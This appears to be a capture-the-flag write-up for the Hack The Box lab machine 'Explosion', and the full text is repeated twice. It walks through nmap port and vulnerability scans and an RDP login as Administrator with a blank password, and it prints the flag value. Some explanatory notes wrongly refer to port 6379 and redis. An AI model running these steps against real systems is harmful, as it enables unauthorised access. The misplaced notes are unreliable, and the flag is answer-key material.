05.EXPLOSION (RDP)

Programming, RDP, Reconnaissance, Weak Credentials

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 135/tcp   open  msrpc         Microsoft Windows RPC
 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds?
 3389/tcp  open  ms-wbt-server Microsoft Terminal Services             //this is RDP
 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc         Microsoft Windows RPC
 49665/tcp open  msrpc         Microsoft Windows RPC
 49666/tcp open  msrpc         Microsoft Windows RPC
 49667/tcp open  msrpc         Microsoft Windows RPC
 49668/tcp open  msrpc         Microsoft Windows RPC
 49669/tcp open  msrpc         Microsoft Windows RPC
 49670/tcp open  msrpc         Microsoft Windows RPC
 49671/tcp open  msrpc         Microsoft Windows RPC

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3389
 PORT   STATE SERVICE VERSION
 3389/tcp open  ms-wbt-server Microsoft Terminal Services
 | rdp-ntlm-info: 
 |   Target_Name: EXPLOSION
 |   NetBIOS_Domain_Name: EXPLOSION
 |   NetBIOS_Computer_Name: EXPLOSION
 |   DNS_Domain_Name: Explosion
 |   DNS_Computer_Name: Explosion
 |   Product_Version: 10.0.17763
 |_  System_Time: 2025-01-30T01:19:05+00:00
 | ssl-cert: Subject: commonName=Explosion
 | Not valid before: 2025-01-29T01:12:11
 |_Not valid after:  2025-07-31T01:12:11
 |_ssl-date: 2025-01-30T01:19:05+00:00; +1m38s from scanner time.
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_clock-skew: mean: 1m37s, deviation: 0s, median: 1m37s

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3389
 3389/tcp open  ms-wbt-server

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

root@htb:~$ which xfreerdp
root@htb:~$ xfreerdp -h
 * /v:<server>[:port] Server hostname
 
root@htb:~$ xfreerdp /v:{targetIP}
 * this uses the attacker's own username as the login username for the RDP 
   session, thus testing guest login capabilities.
    - this is NOT OPSEC safe method --- do not use this!
 
root@htb:~$ xfreerdp /v:{targetIP} /cert:ignore /u:Administrator
 password: {blank}
  - it is uncommon to find a blank password for rdp connections, but worth a try

 * /cert:ignore will disregard all security certificate usage
 * /u:Administrator specifies the login username

PS C\target> cd C:\Users\Administrator\Desktop>
PS C\target>  Get-Content .\flag.txt
 * 951fa96d7830c451b536be5a6be008a0

Previous04.REDEEMER (REDIS DB)Next06.PREIGNITION (WEB FORM LOGIN)

Last updated 2 months ago

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 135/tcp   open  msrpc         Microsoft Windows RPC
 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
 445/tcp   open  microsoft-ds?
 3389/tcp  open  ms-wbt-server Microsoft Terminal Services             //this is RDP
 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
 49664/tcp open  msrpc         Microsoft Windows RPC
 49665/tcp open  msrpc         Microsoft Windows RPC
 49666/tcp open  msrpc         Microsoft Windows RPC
 49667/tcp open  msrpc         Microsoft Windows RPC
 49668/tcp open  msrpc         Microsoft Windows RPC
 49669/tcp open  msrpc         Microsoft Windows RPC
 49670/tcp open  msrpc         Microsoft Windows RPC
 49671/tcp open  msrpc         Microsoft Windows RPC

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3389
 PORT   STATE SERVICE VERSION
 3389/tcp open  ms-wbt-server Microsoft Terminal Services
 | rdp-ntlm-info: 
 |   Target_Name: EXPLOSION
 |   NetBIOS_Domain_Name: EXPLOSION
 |   NetBIOS_Computer_Name: EXPLOSION
 |   DNS_Domain_Name: Explosion
 |   DNS_Computer_Name: Explosion
 |   Product_Version: 10.0.17763
 |_  System_Time: 2025-01-30T01:19:05+00:00
 | ssl-cert: Subject: commonName=Explosion
 | Not valid before: 2025-01-29T01:12:11
 |_Not valid after:  2025-07-31T01:12:11
 |_ssl-date: 2025-01-30T01:19:05+00:00; +1m38s from scanner time.
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

 Host script results:
 |_clock-skew: mean: 1m37s, deviation: 0s, median: 1m37s

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3389
 3389/tcp open  ms-wbt-server

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit root flag

root@htb:~$ which xfreerdp
root@htb:~$ xfreerdp -h
 * /v:<server>[:port] Server hostname
 
root@htb:~$ xfreerdp /v:{targetIP}
 * this uses the attacker's own username as the login username for the RDP 
   session, thus testing guest login capabilities.
    - this is NOT OPSEC safe method --- do not use this!
 
root@htb:~$ xfreerdp /v:{targetIP} /cert:ignore /u:Administrator
 password: {blank}
  - it is uncommon to find a blank password for rdp connections, but worth a try

 * /cert:ignore will disregard all security certificate usage
 * /u:Administrator specifies the login username

PS C\target> cd C:\Users\Administrator\Desktop>
PS C\target>  Get-Content .\flag.txt
 * 951fa96d7830c451b536be5a6be008a0